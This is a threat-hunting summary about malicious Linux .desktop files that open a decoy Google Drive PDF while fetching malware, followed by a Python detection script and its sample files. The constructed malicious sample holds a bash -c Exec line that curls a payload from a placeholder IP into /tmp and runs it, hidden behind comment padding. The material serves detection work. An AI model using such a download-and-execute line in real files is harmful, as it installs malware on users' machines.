
Actionable threat hunting with Threat Intelligence (I) - Hunting malicious desktop files

NetmanageIT OpenCTI - opencti.netmanageit.com




SUMMARY :

This analysis covers the detection of malicious .desktop files used by threat actors to infect Linux desktops (GNOME, KDE and Xfce). It explains the structure of these files and how attackers manipulate them to obscure the malicious content. The report details the execution flow of these files: the Exec entry typically opens a decoy PDF hosted on Google Drive as a distraction while, in the background, it downloads and runs malware. Several threat hunting techniques are presented, including searching for specific processes, command lines and file contents. The article provides several Google Threat Intelligence queries for identifying suspicious .desktop files and related malicious activity, and includes a list of recently discovered samples potentially linked to a campaign reported by Zscaler.
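As an added illustration (this is not code from the OpenCTI report or from the referenced article), the following Python script parses a .desktop file and flags the pattern the summary describes: an Exec entry that wraps a shell command, opens a Google Drive URL with xdg-open as a decoy, and pulls a payload with curl or wget. Both sample files are constructed here, the padding-line threshold is an assumption chosen for the example, and the IP address and Drive file ID are placeholders.

```python
"""Heuristic triage of Linux .desktop files for the decoy-PDF-plus-download pattern."""
import re
from dataclasses import dataclass, field

# Constructed benign sample (not from any real system).
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

# Constructed malicious sample: comment-line padding pushes the Exec key far down
# the file, and Exec opens a decoy Drive URL before fetching a payload.
# 203.0.113.10 is a documentation address and EXAMPLEID is a placeholder.
MALICIOUS_DESKTOP = (
    "[Desktop Entry]\n"
    "Type=Application\n"
    "Name=Invoice\n"
    + "#\n" * 200
    + "Exec=bash -c \"xdg-open https://drive.google.com/file/d/EXAMPLEID/view; "
      "curl -s http://203.0.113.10/payload -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x\"\n"
    "Icon=application-pdf\n"
    "Terminal=false\n"
)


def parse_desktop(text):
    """Return (entries, comment_line_count) for the [Desktop Entry] group.

    Keys keep their first occurrence, mirroring how desktop environments read them.
    """
    entries = {}
    comments = 0
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            comments += 1
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries.setdefault(key.strip(), value.strip())
    return entries, comments


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


# Indicators taken from the behaviour described in the report; patterns are illustrative.
SHELL_WRAPPER = re.compile(r"^(/bin/)?(ba)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
DRIVE_DECOY = re.compile(r"xdg-open\s+\S*drive\.google\.com")


def triage(text, max_comment_lines=20):
    """Score a .desktop file; two or more indicators mark it suspicious (threshold is an assumption)."""
    entries, comments = parse_desktop(text)
    exec_cmd = entries.get("Exec", "")
    reasons = []
    if comments > max_comment_lines:
        reasons.append(f"{comments} comment lines of padding before/around keys")
    if SHELL_WRAPPER.search(exec_cmd):
        reasons.append("Exec wraps a 'sh -c' / 'bash -c' command")
    if DOWNLOADER.search(exec_cmd):
        reasons.append("Exec downloads with curl/wget")
    if DRIVE_DECOY.search(exec_cmd):
        reasons.append("Exec opens a Google Drive URL with xdg-open (decoy)")
    return Verdict(len(reasons) >= 2, reasons)


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_DESKTOP), ("malicious", MALICIOUS_DESKTOP)):
        verdict = triage(sample)
        print(name, "suspicious" if verdict.suspicious else "clean", verdict.reasons)
```

Run it over files collected from ~/.config/autostart, ~/.local/share/applications and ~/Desktop to get a first triage; the regexes only cover the behaviour named in the summary, so treat a clean result as "no known indicator", not as benign.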

OPENCTI LABELS :

linux,pdf,obfuscation,threat hunting,google drive,xfce,desktop files,kde,google threat intelligence,gnome



